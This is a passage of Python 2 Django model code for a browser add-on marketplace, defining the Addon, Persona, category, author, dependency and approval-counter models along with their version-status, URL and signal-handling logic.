data = cls.resolve_webext_translations(data, upload)
addon = Addon(**dict((k, v) for k, v in data.items() if k in fields))
addon.status = amo.STATUS_NULL
locale_is_set = (addon.default_locale and
addon.default_locale in (
settings.AMO_LANGUAGES +
settings.HIDDEN_LANGUAGES) and
data.get('default_locale') == addon.default_locale)
if not locale_is_set:
addon.default_locale = to_language(trans_real.get_language())
addon.save()
if old_guid_addon:
old_guid_addon.update(guid='guid-reused-by-pk-{}'.format(addon.pk))
old_guid_addon.save()
return addon
@classmethod
def create_addon_from_upload_data(cls, data, upload, channel, user=None,
**kwargs):
addon = cls.initialize_addon_from_upload(data, upload, channel,
**kwargs)
AddonUser(addon=addon, user=user).save()
return addon
@classmethod
def from_upload(cls, upload, platforms, source=None,
channel=amo.RELEASE_CHANNEL_LISTED, parsed_data=None):
if not parsed_data:
parsed_data = parse_addon(upload)
addon = cls.initialize_addon_from_upload(parsed_data, upload, channel)
if upload.validation_timeout:
addon.update(admin_review=True)
Version.from_upload(upload, addon, platforms, source=source,
channel=channel)
activity.log_create(amo.LOG.CREATE_ADDON, addon)
log.debug('New addon %r from %r' % (addon, upload))
return addon
@classmethod
def resolve_webext_translations(cls, data, upload):
"""Resolve all possible translations from an add-on.
This returns a modified `data` dictionary accordingly with proper
translations filled in.
"""
default_locale = find_language(data.get('default_locale'))
if not data.get('is_webextension') or not default_locale:
# Don't change anything if we don't meet the requirements
return data
fields = ('name', 'homepage', 'summary')
messages = extract_translations(upload)
for field in fields:
data[field] = {
locale: resolve_i18n_message(
data[field],
locale=locale,
default_locale=default_locale,
messages=messages)
for locale in messages
}
return data
def get_url_path(self, more=False, add_prefix=True):
if not self.current_version:
return ''
# If more=True you get the link to the ajax'd middle chunk of the
# detail page.
view = 'addons.detail_more' if more else 'addons.detail'
return reverse(view, args=[self.slug], add_prefix=add_prefix)
def get_dev_url(self, action='edit', args=None, prefix_only=False):
args = args or []
prefix = 'devhub'
type_ = 'themes' if self.type == amo.ADDON_PERSONA else 'addons'
if not prefix_only:
prefix += '.%s' % type_
view_name = '{prefix}.{action}'.format(prefix=prefix,
action=action)
return reverse(view_name, args=[self.slug] + args)
def get_detail_url(self, action='detail', args=None):
if args is None:
args = []
return reverse('addons.%s' % action, args=[self.slug] + args)
def meet_the_dev_url(self):
return reverse('addons.meet', args=[self.slug])
@property
def reviews_url(self):
return helpers.url('addons.reviews.list', self.slug)
def get_ratings_url(self, action='list', args=None, add_prefix=True):
return reverse('ratings.themes.%s' % action,
args=[self.slug] + (args or []),
add_prefix=add_prefix)
@classmethod
def get_type_url(cls, type):
try:
type = amo.ADDON_SLUGS[type]
except KeyError:
return None
return reverse('browse.%s' % type)
def type_url(self):
"""The url for this add-on's type."""
return Addon.get_type_url(self.type)
def share_url(self):
return reverse('addons.share', args=[self.slug])
@cached_property
def listed_authors(self):
return UserProfile.objects.filter(
addons=self,
addonuser__listed=True).order_by('addonuser__position')
@classmethod
def get_fallback(cls):
return cls._meta.get_field('default_locale')
@property
def reviews(self):
return Review.objects.filter(addon=self, reply_to=None)
def get_category(self, app_id):
categories = self.app_categories.get(amo.APP_IDS.get(app_id))
return categories[0] if categories else None
def language_ascii(self):
lang = trans_real.to_language(self.default_locale)
return settings.LANGUAGES.get(lang)
@property
def valid_file_statuses(self):
if self.status == amo.STATUS_PUBLIC:
return [amo.STATUS_PUBLIC]
return amo.VALID_FILE_STATUSES
def find_latest_public_listed_version(self):
"""Retrieve the latest public listed version of an addon.
If the add-on is not public, it can return a listed version awaiting
review (since non-public add-ons should not have public versions)."""
if self.type == amo.ADDON_PERSONA:
return
try:
statuses = self.valid_file_statuses
status_list = ','.join(map(str, statuses))
fltr = {
'channel': amo.RELEASE_CHANNEL_LISTED,
'files__status__in': statuses
}
return self.versions.no_cache().filter(**fltr).extra(
where=["""
NOT EXISTS (
SELECT 1 FROM files AS f2
WHERE f2.version_id = versions.id AND
f2.status NOT IN (%s))
""" % status_list])[0]
except (IndexError, Version.DoesNotExist):
return None
def find_latest_version(
self, channel, exclude=(amo.STATUS_DISABLED, amo.STATUS_BETA)):
"""Retrieve the latest version of an add-on for the specified channel.
If channel is None either channel is returned.
Keyword arguments:
exclude -- exclude versions for which all files have one
of those statuses (default STATUS_DISABLED, STATUS_BETA)."""
# If the add-on is deleted or hasn't been saved yet, it should not
# have a latest version.
if not self.id or self.status == amo.STATUS_DELETED:
return None
# We can't use .exclude(files__status=excluded_statuses) because that
# would exclude a version if *any* of its files match but if there is
# only one file that doesn't have one of the excluded statuses it
# should be enough for that version to be considered.
statuses_no_disabled_or_beta = (
set(amo.STATUS_CHOICES_FILE.keys()) - set(exclude))
try:
latest_qs = (
Version.objects.filter(addon=self)
.filter(files__status__in=statuses_no_disabled_or_beta))
if channel is not None:
latest_qs = latest_qs.filter(channel=channel)
latest = latest_qs.latest()
latest.addon = self
except Version.DoesNotExist:
latest = None
return latest
@write
def update_version(self, ignore=None, _signal=True):
"""
Update the current_version field on this add-on if necessary.
Returns True if we updated the current_version field.
The optional ``ignore`` parameter, if present, is a a version
to not consider as part of the update, since it may be in the
process of being deleted.
Pass ``_signal=False`` if you want to no signals fired at all.
"""
if self.is_persona():
# Themes should only have a single version. So, if there is not
# current version set, we just need to copy over the latest version
# to current_version and we should never have to set it again.
if not self._current_version:
latest_version = self.find_latest_version(None)
if latest_version:
self.update(_current_version=latest_version, _signal=False)
return True
return False
new_current_version = self.find_latest_public_listed_version()
updated = {}
send_signal = False
if self._current_version != new_current_version:
updated['_current_version'] = new_current_version
send_signal = True
# update_version can be called by a post_delete signal (such
# as File's) when deleting a version. If so, we should avoid putting
# that version-being-deleted in any fields.
if ignore is not None:
updated = {k: v for k, v in updated.iteritems() if v != ignore}
if updated:
diff = [self._current_version, new_current_version]
# Pass along _signal to the .update() to prevent it from firing
# signals if we don't want them.
updated['_signal'] = _signal
try:
self.update(**updated)
if send_signal and _signal:
signals.version_changed.send(sender=self)
log.info(u'Version changed from current: %s to %s '
u'for addon %s'
% tuple(diff + [self]))
except Exception, e:
log.error(u'Could not save version changes current: %s to %s '
u'for addon %s (%s)' %
tuple(diff + [self, e]))
return bool(updated)
def increment_theme_version_number(self):
"""Increment theme version number by 1."""
latest_version = self.find_latest_version(None)
version = latest_version or self.current_version
version.version = str(float(version.version) + 1)
# Set the current version.
self.update(_current_version=version.save())
def invalidate_d2c_versions(self):
"""Invalidates the cache of compatible versions.
Call this when there is an event that may change what compatible
versions are returned so they are recalculated.
"""
key = cache_ns_key('d2c-versions:%s' % self.id, increment=True)
log.info('Incrementing d2c-versions namespace for add-on [%s]: %s' % (
self.id, key))
@property
def current_version(self):
"""Return the latest public listed version of an addon
If the add-on is not public, it can return a listed version awaiting
review (since non-public add-ons should not have public versions).
If the add-on has not been created yet or is deleted, it returns None.
"""
if not self.id or self.status == amo.STATUS_DELETED:
return None
try:
return self._current_version
except ObjectDoesNotExist:
pass
return None
@cached_property
def latest_unlisted_version(self):
"""Shortcut property for Addon.find_latest_version(
channel=RELEASE_CHANNEL_UNLISTED)."""
return self.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
@cached_property
def binary(self):
"""Returns if the current version has binary files."""
version = self.current_version
if version:
return version.files.filter(binary=True).exists()
return False
@cached_property
def binary_components(self):
"""Returns if the current version has files with binary_components."""
version = self.current_version
if version:
return version.files.filter(binary_components=True).exists()
return False
def get_icon_dir(self):
return os.path.join(helpers.user_media_path('addon_icons'),
'%s' % (self.id / 1000))
def get_icon_url(self, size, use_default=True):
"""
Returns the addon's icon url according to icon_type.
If it's a persona, it will return the icon_url of the associated
Persona instance.
If it's a theme and there is no icon set, it will return the default
theme icon.
If it's something else, it will return the default add-on icon, unless
use_default is False, in which case it will return None.
"""
icon_type_split = []
if self.icon_type:
icon_type_split = self.icon_type.split('/')
# Get the closest allowed size without going over
if (size not in amo.ADDON_ICON_SIZES and
size >= amo.ADDON_ICON_SIZES[0]):
size = [s for s in amo.ADDON_ICON_SIZES if s < size][-1]
elif size < amo.ADDON_ICON_SIZES[0]:
size = amo.ADDON_ICON_SIZES[0]
# Figure out what to return for an image URL
if self.type == amo.ADDON_PERSONA:
return self.persona.icon_url
if not self.icon_type:
if self.type == amo.ADDON_THEME:
icon = amo.ADDON_ICONS[amo.ADDON_THEME]
return "%simg/icons/%s" % (settings.STATIC_URL, icon)
else:
if not use_default:
return None
return self.get_default_icon_url(size)
elif icon_type_split[0] == 'icon':
return '{0}img/addon-icons/{1}-{2}.png'.format(
settings.STATIC_URL,
icon_type_split[1],
size
)
else:
# [1] is the whole ID, [2] is the directory
split_id = re.match(r'((\d*?)\d{1,3})$', str(self.id))
modified = int(time.mktime(self.modified.timetuple()))
path = '/'.join([
split_id.group(2) or '0',
'{0}-{1}.png?modified={2}'.format(self.id, size, modified),
])
return helpers.user_media_url('addon_icons') + path
def get_default_icon_url(self, size):
return '{0}img/addon-icons/{1}-{2}.png'.format(
settings.STATIC_URL, 'default', size
)
@write
def update_status(self, ignore_version=None):
self.reload()
if (self.status in [amo.STATUS_NULL, amo.STATUS_DELETED] or
self.is_disabled or self.is_persona()):
self.update_version(ignore=ignore_version)
return
versions = self.versions.filter(channel=amo.RELEASE_CHANNEL_LISTED)
status = None
if not versions.exists():
status = amo.STATUS_NULL
reason = 'no listed versions'
elif not versions.filter(
files__status__in=amo.VALID_FILE_STATUSES).exists():
status = amo.STATUS_NULL
reason = 'no listed version with valid file'
elif (self.status == amo.STATUS_PUBLIC and
not versions.filter(files__status=amo.STATUS_PUBLIC).exists()):
if versions.filter(
files__status=amo.STATUS_AWAITING_REVIEW).exists():
status = amo.STATUS_NOMINATED
reason = 'only an unreviewed file'
else:
status = amo.STATUS_NULL
reason = 'no reviewed files'
elif self.status == amo.STATUS_PUBLIC:
latest_version = self.find_latest_version(
channel=amo.RELEASE_CHANNEL_LISTED)
if (latest_version and latest_version.has_files and
(latest_version.all_files[0].status ==
amo.STATUS_AWAITING_REVIEW)):
# Addon is public, but its latest file is not (it's the case on
# a new file upload). So, call update, to trigger watch_status,
# which takes care of setting nomination time when needed.
status = self.status
reason = 'triggering watch_status'
if status is not None:
log.info('Changing add-on status [%s]: %s => %s (%s).'
% (self.id, self.status, status, reason))
self.update(status=status)
activity.log_create(amo.LOG.CHANGE_STATUS,
self.get_status_display(), self)
self.update_version(ignore=ignore_version)
@staticmethod
def attach_related_versions(addons, addon_dict=None):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
all_ids = set(filter(None, (a._current_version_id for a in addons)))
versions = list(Version.objects.filter(id__in=all_ids).order_by())
for version in versions:
try:
addon = addon_dict[version.addon_id]
except KeyError:
log.debug('Version %s has an invalid add-on id.' % version.id)
continue
if addon._current_version_id == version.id:
addon._current_version = version
version.addon = addon
@staticmethod
def attach_listed_authors(addons, addon_dict=None):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
qs = (UserProfile.objects.no_cache()
.filter(addons__in=addons, addonuser__listed=True)
.extra(select={'addon_id': 'addons_users.addon_id',
'position': 'addons_users.position'}))
qs = sorted(qs, key=lambda u: (u.addon_id, u.position))
for addon_id, users in itertools.groupby(qs, key=lambda u: u.addon_id):
addon_dict[addon_id].listed_authors = list(users)
# FIXME: set listed_authors to empty list on addons without listed
# authors.
@staticmethod
def attach_previews(addons, addon_dict=None, no_transforms=False):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
qs = Preview.objects.filter(addon__in=addons,
position__gte=0).order_by()
if no_transforms:
qs = qs.no_transforms()
qs = sorted(qs, key=lambda x: (x.addon_id, x.position, x.created))
for addon, previews in itertools.groupby(qs, lambda x: x.addon_id):
addon_dict[addon].all_previews = list(previews)
# FIXME: set all_previews to empty list on addons without previews.
@staticmethod
def attach_static_categories(addons, addon_dict=None):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
qs = AddonCategory.objects.values_list(
'addon', 'category').filter(addon__in=addon_dict)
qs = sorted(qs, key=lambda x: (x[0], x[1]))
for addon_id, cats_iter in itertools.groupby(qs, key=lambda x: x[0]):
# The second value of each tuple in cats_iter are the category ids
# we want.
addon_dict[addon_id].category_ids = [c[1] for c in cats_iter]
addon_dict[addon_id].all_categories = [
CATEGORIES_BY_ID[cat_id] for cat_id
in addon_dict[addon_id].category_ids
if cat_id in CATEGORIES_BY_ID]
@staticmethod
@timer
def transformer(addons):
if not addons:
return
addon_dict = {a.id: a for a in addons}
# Attach categories. This needs to be done before separating addons
# from personas, because Personas need categories for the theme_data
# JSON dump, rest of the add-ons need the first category to be
# displayed in detail page / API.
Addon.attach_static_categories(addons, addon_dict=addon_dict)
personas = [a for a in addons if a.type == amo.ADDON_PERSONA]
addons = [a for a in addons if a.type != amo.ADDON_PERSONA]
# Set _current_version.
Addon.attach_related_versions(addons, addon_dict=addon_dict)
# Attach listed authors.
Addon.attach_listed_authors(addons, addon_dict=addon_dict)
# Persona-specific stuff
for persona in Persona.objects.no_cache().filter(addon__in=personas):
addon = addon_dict[persona.addon_id]
addon.persona = persona
addon.weekly_downloads = persona.popularity
# Attach previews.
Addon.attach_previews(addons, addon_dict=addon_dict)
return addon_dict
@property
def show_beta(self):
return self.status == amo.STATUS_PUBLIC and self.current_beta_version
def show_adu(self):
return self.type != amo.ADDON_SEARCH
@cached_property
def current_beta_version(self):
"""Retrieves the latest version of an addon, in the beta channel."""
versions = self.versions.filter(files__status=amo.STATUS_BETA)[:1]
if versions:
return versions[0]
@property
def icon_url(self):
return self.get_icon_url(32)
def authors_other_addons(self, app=None):
"""
Return other addons by the author(s) of this addon,
optionally takes an app.
"""
if app:
qs = Addon.objects.listed(app)
else:
qs = Addon.objects.valid()
return (qs.exclude(id=self.id)
.filter(addonuser__listed=True,
authors__in=self.listed_authors)
.distinct())
@property
def contribution_url(self, lang=settings.LANGUAGE_CODE,
app=settings.DEFAULT_APP):
return reverse('addons.contribute', args=[self.slug])
@property
def thumbnail_url(self):
"""
Returns the addon's thumbnail url or a default.
"""
try:
preview = self.all_previews[0]
return preview.thumbnail_url
except IndexError:
return settings.STATIC_URL + '/img/icons/no-preview.png'
def can_request_review(self):
"""Return whether an add-on can request a review or not."""
if (self.is_disabled or
self.status in (amo.STATUS_PUBLIC,
amo.STATUS_NOMINATED,
amo.STATUS_DELETED)):
return False
latest_version = self.find_latest_version(
amo.RELEASE_CHANNEL_LISTED, exclude=(amo.STATUS_BETA,))
return latest_version is not None and latest_version.files.exists()
def is_persona(self):
return self.type == amo.ADDON_PERSONA
@property
def is_disabled(self):
"""True if this Addon is disabled.
It could be disabled by an admin or disabled by the developer
"""
return self.status == amo.STATUS_DISABLED or self.disabled_by_user
@property
def is_deleted(self):
return self.status == amo.STATUS_DELETED
def is_unreviewed(self):
return self.status in amo.UNREVIEWED_ADDON_STATUSES
def is_public(self):
return self.status == amo.STATUS_PUBLIC and not self.disabled_by_user
def has_complete_metadata(self, has_listed_versions=None):
"""See get_required_metadata for has_listed_versions details."""
return all(self.get_required_metadata(
has_listed_versions=has_listed_versions))
def get_required_metadata(self, has_listed_versions=None):
"""If has_listed_versions is not specified this method will return the
current (required) metadata (truthy values if present) for this Addon.
If has_listed_versions is specified then the method will act as if
Addon.has_listed_versions() returns that value. Used to predict if the
addon will require extra metadata before a version is created."""
if has_listed_versions is None:
has_listed_versions = self.has_listed_versions()
if not has_listed_versions:
# Add-ons with only unlisted versions have no required metadata.
return []
# We need to find out if the add-on has a license set. We prefer to
# check the current_version first because that's what would be used for
# public pages, but if there isn't any listed version will do.
version = self.current_version or self.find_latest_version(
channel=amo.RELEASE_CHANNEL_LISTED, exclude=())
return [
self.all_categories,
self.summary,
(version and version.license),
]
def should_redirect_to_submit_flow(self):
return (
self.status == amo.STATUS_NULL and
not self.has_complete_metadata() and
self.find_latest_version(channel=amo.RELEASE_CHANNEL_LISTED))
def is_pending(self):
return self.status == amo.STATUS_PENDING
def is_rejected(self):
return self.status == amo.STATUS_REJECTED
def can_be_deleted(self):
return not self.is_deleted
def has_listed_versions(self):
return self.versions.filter(
channel=amo.RELEASE_CHANNEL_LISTED).exists()
def has_unlisted_versions(self):
return self.versions.filter(
channel=amo.RELEASE_CHANNEL_UNLISTED).exists()
@classmethod
def featured_random(cls, app, lang):
return get_featured_ids(app, lang)
@property
def requires_restart(self):
"""Whether the add-on current version requires a browser restart to
work."""
return self.current_version and self.current_version.requires_restart
def is_featured(self, app, lang=None):
"""Is add-on globally featured for this app and language?"""
if app:
return self.id in get_featured_ids(app, lang)
def has_full_profile(self):
"""Is developer profile public (completed)?"""
return self.the_reason and self.the_future
def has_profile(self):
"""Is developer profile (partially or entirely) completed?"""
return self.the_reason or self.the_future
@cached_property
def tags_partitioned_by_developer(self):
"""Returns a tuple of developer tags and user tags for this addon."""
tags = self.tags.not_denied()
if self.is_persona:
return [], tags
user_tags = tags.exclude(addon_tags__user__in=self.listed_authors)
dev_tags = tags.exclude(id__in=[t.id for t in user_tags])
return dev_tags, user_tags
@cached_property
def compatible_apps(self):
"""Shortcut to get compatible apps for the current version."""
# Search providers and personas don't list their supported apps.
if self.type in amo.NO_COMPAT:
return dict((app, None) for app in
amo.APP_TYPE_SUPPORT[self.type])
if self.current_version:
return self.current_version.compatible_apps
else:
return {}
def accepts_compatible_apps(self):
"""True if this add-on lists compatible apps."""
return self.type not in amo.NO_COMPAT
def incompatible_latest_apps(self):
"""Returns a list of applications with which this add-on is
incompatible (based on the latest version of each app).
"""
return [app for app, ver in self.compatible_apps.items() if ver and
version_int(ver.max.version) < version_int(app.latest_version)]
def has_author(self, user, roles=None):
"""True if ``user`` is an author with any of the specified ``roles``.
``roles`` should be a list of valid roles (see amo.AUTHOR_ROLE_*). If
not specified, has_author will return true if the user has any role.
"""
if user is None or user.is_anonymous():
return False
if roles is None:
roles = dict(amo.AUTHOR_CHOICES).keys()
return AddonUser.objects.filter(addon=self, user=user,
role__in=roles).exists()
@property
def takes_contributions(self):
return (self.status == amo.STATUS_PUBLIC and
self.wants_contributions and
(self.paypal_id or self.charity_id))
@classmethod
def _last_updated_queries(cls):
"""
Get the queries used to calculate addon.last_updated.
"""
status_change = Max('versions__files__datestatuschanged')
public = (
Addon.objects.no_cache().filter(
status=amo.STATUS_PUBLIC,
versions__files__status=amo.STATUS_PUBLIC)
.exclude(type=amo.ADDON_PERSONA)
.values('id').annotate(last_updated=status_change))
stati = amo.VALID_ADDON_STATUSES
exp = (Addon.objects.no_cache().exclude(status__in=stati)
.filter(versions__files__status__in=amo.VALID_FILE_STATUSES)
.values('id')
.annotate(last_updated=Max('versions__files__created')))
personas = (Addon.objects.no_cache().filter(type=amo.ADDON_PERSONA)
.extra(select={'last_updated': 'created'}))
return dict(public=public, exp=exp, personas=personas)
@cached_property
def all_categories(self):
return filter(
None, [cat.to_static_category() for cat in self.categories.all()])
@cached_property
def all_previews(self):
return list(self.get_previews())
def get_previews(self):
"""Exclude promo graphics."""
return self.previews.exclude(position=-1)
@property
def app_categories(self):
app_cats = {}
categories = sorted_groupby(
sorted(self.all_categories, key=attrgetter('weight', 'name')),
key=lambda x: amo.APP_IDS.get(x.application))
for app, cats in categories:
app_cats[app] = list(cats)
return app_cats
def remove_locale(self, locale):
"""NULLify strings in this locale for the add-on and versions."""
for o in itertools.chain([self], self.versions.all()):
Translation.objects.remove_for(o, locale)
def get_localepicker(self):
"""For language packs, gets the contents of localepicker."""
if (self.type == amo.ADDON_LPAPP and
self.status == amo.STATUS_PUBLIC and
self.current_version):
files = (self.current_version.files
.filter(platform=amo.PLATFORM_ANDROID.id))
try:
return unicode(files[0].get_localepicker(), 'utf-8')
except IndexError:
pass
return ''
def can_review(self, user):
return not(user and self.has_author(user))
@property
def all_dependencies(self):
"""Return all the (valid) add-ons this add-on depends on."""
return list(self.dependencies.valid().all()[:3])
def check_ownership(self, request, require_owner, require_author,
ignore_disabled, admin):
"""
Used by acl.check_ownership to see if request.user has permissions for
the addon.
"""
if require_author:
require_owner = False
ignore_disabled = True
admin = False
return acl.check_addon_ownership(request, self, admin=admin,
viewer=(not require_owner),
ignore_disabled=ignore_disabled)
@property
def feature_compatibility(self):
try:
feature_compatibility = self.addonfeaturecompatibility
except AddonFeatureCompatibility.DoesNotExist:
# If it does not exist, return a blank one, no need to create. It's
# the caller responsibility to create when needed to avoid
# unexpected database writes.
feature_compatibility = AddonFeatureCompatibility()
return feature_compatibility
def should_show_permissions(self, version=None):
version = version or self.current_version
return (self.type == amo.ADDON_EXTENSION and
version and version.all_files[0] and
(not version.all_files[0].is_webextension or
version.all_files[0].webext_permissions))
dbsignals.pre_save.connect(save_signal, sender=Addon,
dispatch_uid='addon_translations')
@receiver(signals.version_changed, dispatch_uid='version_changed')
def version_changed(sender, **kw):
from . import tasks
tasks.version_changed.delay(sender.id)
@receiver(dbsignals.post_save, sender=Addon,
dispatch_uid='addons.search.index')
def update_search_index(sender, instance, **kw):
from . import tasks
if not kw.get('raw'):
tasks.index_addons.delay([instance.id])
@Addon.on_change
def watch_status(old_attr=None, new_attr=None, instance=None,
sender=None, **kwargs):
"""
Set nomination date if the addon is new in queue or updating.
The nomination date cannot be reset, say, when a developer cancels
their request for review and re-requests review.
If a version is rejected after nomination, the developer has
to upload a new version.
"""
if old_attr is None:
old_attr = {}
if new_attr is None:
new_attr = {}
new_status = new_attr.get('status')
old_status = old_attr.get('status')
latest_version = instance.find_latest_version(
channel=amo.RELEASE_CHANNEL_LISTED)
if (new_status not in amo.VALID_ADDON_STATUSES or
not new_status or not latest_version):
return
if old_status not in amo.UNREVIEWED_ADDON_STATUSES:
# New: will (re)set nomination only if it's None.
latest_version.reset_nomination_time()
elif latest_version.has_files:
# Updating: inherit nomination from last nominated version.
# Calls `inherit_nomination` manually given that signals are
# deactivated to avoid circular calls.
inherit_nomination(None, latest_version)
@Addon.on_change
def watch_disabled(old_attr=None, new_attr=None, instance=None, sender=None,
**kwargs):
if old_attr is None:
old_attr = {}
if new_attr is None:
new_attr = {}
attrs = dict((k, v) for k, v in old_attr.items()
if k in ('disabled_by_user', 'status'))
if Addon(**attrs).is_disabled and not instance.is_disabled:
for f in File.objects.filter(version__addon=instance.id):
f.unhide_disabled_file()
if instance.is_disabled and not Addon(**attrs).is_disabled:
for f in File.objects.filter(version__addon=instance.id):
f.hide_disabled_file()
@Addon.on_change
def watch_developer_notes(old_attr=None, new_attr=None, instance=None,
sender=None, **kwargs):
if old_attr is None:
old_attr = {}
if new_attr is None:
new_attr = {}
whiteboard_changed = (
new_attr.get('whiteboard') and
old_attr.get('whiteboard') != new_attr.get('whiteboard'))
developer_comments_changed = (new_attr.get('_developer_comments_cache') and
old_attr.get('_developer_comments_cache') !=
new_attr.get('_developer_comments_cache'))
if whiteboard_changed or developer_comments_changed:
instance.versions.update(has_info_request=False)
def attach_translations(addons):
"""Put all translations into a translations dict."""
attach_trans_dict(Addon, addons)
def attach_tags(addons):
addon_dict = dict((a.id, a) for a in addons)
qs = (Tag.objects.not_denied().filter(addons__in=addon_dict)
.values_list('addons__id', 'tag_text'))
for addon, tags in sorted_groupby(qs, lambda x: x[0]):
addon_dict[addon].tag_list = [t[1] for t in tags]
class Persona(caching.CachingMixin, models.Model):
"""Personas-specific additions to the add-on model."""
STATUS_CHOICES = amo.STATUS_CHOICES_PERSONA
addon = models.OneToOneField(Addon, null=True)
persona_id = models.PositiveIntegerField(db_index=True)
# name: deprecated in favor of Addon model's name field
# description: deprecated, ditto
header = models.CharField(max_length=64, null=True)
footer = models.CharField(max_length=64, null=True)
accentcolor = models.CharField(max_length=10, null=True)
textcolor = models.CharField(max_length=10, null=True)
author = models.CharField(max_length=255, null=True)
display_username = models.CharField(max_length=255, null=True)
submit = models.DateTimeField(null=True)
approve = models.DateTimeField(null=True)
movers = models.FloatField(null=True, db_index=True)
popularity = models.IntegerField(null=False, default=0, db_index=True)
license = models.PositiveIntegerField(
choices=amo.PERSONA_LICENSES_CHOICES, null=True, blank=True)
# To spot duplicate submissions.
checksum = models.CharField(max_length=64, blank=True, default='')
dupe_persona = models.ForeignKey('self', null=True)
objects = caching.CachingManager()
class Meta:
db_table = 'personas'
def __unicode__(self):
return unicode(self.addon.name)
def is_new(self):
return self.persona_id == 0
def _image_url(self, filename):
host = helpers.user_media_url('addons')
image_url = posixpath.join(host, str(self.addon.id), filename or '')
# TODO: Bust the cache on the hash of the image contents or something.
if self.addon.modified is not None:
modified = int(time.mktime(self.addon.modified.timetuple()))
else:
modified = 0
return '%s?%s' % (image_url, modified)
def _image_path(self, filename):
return os.path.join(helpers.user_media_path('addons'),
str(self.addon.id), filename)
@cached_property
def thumb_url(self):
"""
Handles deprecated GetPersonas URL.
In days of yore, preview.jpg used to be a separate image.
In modern days, we use the same image for big preview + thumb.
"""
if self.is_new():
return self._image_url('preview.png')
else:
return self._image_url('preview.jpg')
@cached_property
def thumb_path(self):
"""
Handles deprecated GetPersonas path.
In days of yore, preview.jpg used to be a separate image.
In modern days, we use the same image for big preview + thumb.
"""
if self.is_new():
return self._image_path('preview.png')
else:
return self._image_path('preview.jpg')
@cached_property
def icon_url(self):
"""URL to personas square preview."""
if self.is_new():
return self._image_url('icon.png')
else:
return self._image_url('preview_small.jpg')
@cached_property
def icon_path(self):
"""Path to personas square preview."""
if self.is_new():
return self._image_path('icon.png')
else:
return self._image_path('preview_small.jpg')
@cached_property
def preview_url(self):
"""URL to Persona's big, 680px, preview."""
if self.is_new():
return self._image_url('preview.png')
else:
return self._image_url('preview_large.jpg')
@cached_property
def preview_path(self):
"""Path to Persona's big, 680px, preview."""
if self.is_new():
return self._image_path('preview.png')
else:
return self._image_path('preview_large.jpg')
@cached_property
def header_url(self):
return self._image_url(self.header)
@cached_property
def footer_url(self):
return self.footer and self._image_url(self.footer) or ''
@cached_property
def header_path(self):
return self._image_path(self.header)
@cached_property
def footer_path(self):
return self.footer and self._image_path(self.footer) or ''
@cached_property
def update_url(self):
locale = settings.LANGUAGE_URL_MAP.get(trans_real.get_language())
return settings.NEW_PERSONAS_UPDATE_URL % {
'locale': locale or settings.LANGUAGE_CODE,
'id': self.addon.id
}
@cached_property
def theme_data(self):
"""Theme JSON Data for Browser/extension preview."""
def hexcolor(color):
return '#%s' % color
addon = self.addon
return {
'id': unicode(self.addon.id), # Personas dislikes ints
'name': unicode(addon.name),
'accentcolor': hexcolor(self.accentcolor),
'textcolor': hexcolor(self.textcolor),
'category': (unicode(addon.all_categories[0].name) if
addon.all_categories else ''),
# TODO: Change this to be `addons_users.user.display_name`.
'author': self.display_username,
'description': unicode(addon.description),
'header': self.header_url,
'footer': self.footer_url or '',
'headerURL': self.header_url,
'footerURL': self.footer_url or '',
'previewURL': self.preview_url,
'iconURL': self.icon_url,
'updateURL': self.update_url,
'detailURL': helpers.absolutify(self.addon.get_url_path()),
'version': '1.0'
}
@property
def json_data(self):
"""Persona JSON Data for Browser/extension preview."""
return json.dumps(self.theme_data,
separators=(',', ':'), cls=AMOJSONEncoder)
def authors_other_addons(self, app=None):
"""
Return other addons by the author(s) of this addon,
optionally takes an app.
"""
qs = (Addon.objects.valid()
.exclude(id=self.addon.id)
.filter(type=amo.ADDON_PERSONA))
return (qs.filter(addonuser__listed=True,
authors__in=self.addon.listed_authors)
.distinct())
@cached_property
def listed_authors(self):
return self.addon.listed_authors
class AddonCategory(caching.CachingMixin, models.Model):
addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
category = models.ForeignKey('Category')
feature = models.BooleanField(default=False)
feature_locales = models.CharField(max_length=255, default='', null=True)
objects = caching.CachingManager()
class Meta:
db_table = 'addons_categories'
unique_together = ('addon', 'category')
@classmethod
def creatured_random(cls, category, lang):
return get_creatured_ids(category, lang)
class AddonUser(caching.CachingMixin, models.Model):
addon = models.ForeignKey(Addon, on_delete=models.CASCADE)
user = UserForeignKey()
role = models.SmallIntegerField(default=amo.AUTHOR_ROLE_OWNER,
choices=amo.AUTHOR_CHOICES)
listed = models.BooleanField(_(u'Listed'), default=True)
position = models.IntegerField(default=0)
objects = caching.CachingManager()
def __init__(self, *args, **kwargs):
super(AddonUser, self).__init__(*args, **kwargs)
self._original_role = self.role
self._original_user_id = self.user_id
class Meta:
db_table = 'addons_users'
class AddonDependency(models.Model):
addon = models.ForeignKey(Addon, related_name='addons_dependencies')
dependent_addon = models.ForeignKey(Addon, related_name='dependent_on')
class Meta:
db_table = 'addons_dependencies'
unique_together = ('addon', 'dependent_addon')
class AddonFeatureCompatibility(ModelBase):
addon = models.OneToOneField(
Addon, primary_key=True, on_delete=models.CASCADE)
e10s = models.PositiveSmallIntegerField(
choices=amo.E10S_COMPATIBILITY_CHOICES, default=amo.E10S_UNKNOWN)
def __unicode__(self):
return unicode(self.addon) if self.pk else u""
def get_e10s_classname(self):
return amo.E10S_COMPATIBILITY_CHOICES_API[self.e10s]
class AddonApprovalsCounter(ModelBase):
"""Model holding a counter of the number of times a listed version
belonging to an add-on has been approved by a human. Reset everytime a
listed version is auto-approved for this add-on."""
addon = models.OneToOneField(
Addon, primary_key=True, on_delete=models.CASCADE)
counter = models.PositiveIntegerField(default=0)
last_human_review = models.DateTimeField(null=True)
def __unicode__(self):
return u'%s: %d' % (unicode(self.pk), self.counter) if self.pk else u''
@classmethod
def increment_for_addon(cls, addon):
"""
Increment approval counter for the specified addon, setting the last
human review date to now. If an AddonApprovalsCounter already exists,
it updates it, otherwise it creates and saves a new instance.
"""
data = {
'counter': 1,
'last_human_review': datetime.now(),
}
obj, created = cls.objects.get_or_create(
addon=addon, defaults=data)
if not created:
data['counter'] = F('counter') + 1
obj.update(**data)
return obj
@classmethod
def reset_for_addon(cls, addon):
"""
Reset the approval counter for the specified addon.
"""
obj, created = cls.objects.update_or_create(
addon=addon, defaults={'counter': 0})
return obj
